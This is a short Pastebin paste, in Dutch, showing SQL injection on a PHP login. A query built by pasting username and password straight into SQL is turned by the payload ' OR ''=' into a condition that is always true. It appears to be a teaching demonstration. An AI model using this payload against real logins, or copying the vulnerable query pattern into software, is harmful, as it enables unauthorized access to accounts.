Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- inlog-PROCEDURE
- De query IN PHP:
- SELECT COUNT(*)
- FROM somewhere
- WHERE username = '$username'
- AND password = '$password'
- --- de normale login-poging
- URL IN de browser:
- /code/inlog.php?username=Skip&password=veilig
- De query IS dan:
- SELECT COUNT(*)
- FROM somewhere
- WHERE username = 'Skip'
- AND password = 'veilig'
- --- de hack-poging...
- URL IN de browser:
- /code/inlog.php?username=Skip&password=' OR ''='
- De query IS dan:
- SELECT COUNT(*)
- FROM somewhere
- WHERE username = 'Skip'
- AND password = '' OR ''='' (dit IS altijd TRUE...)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement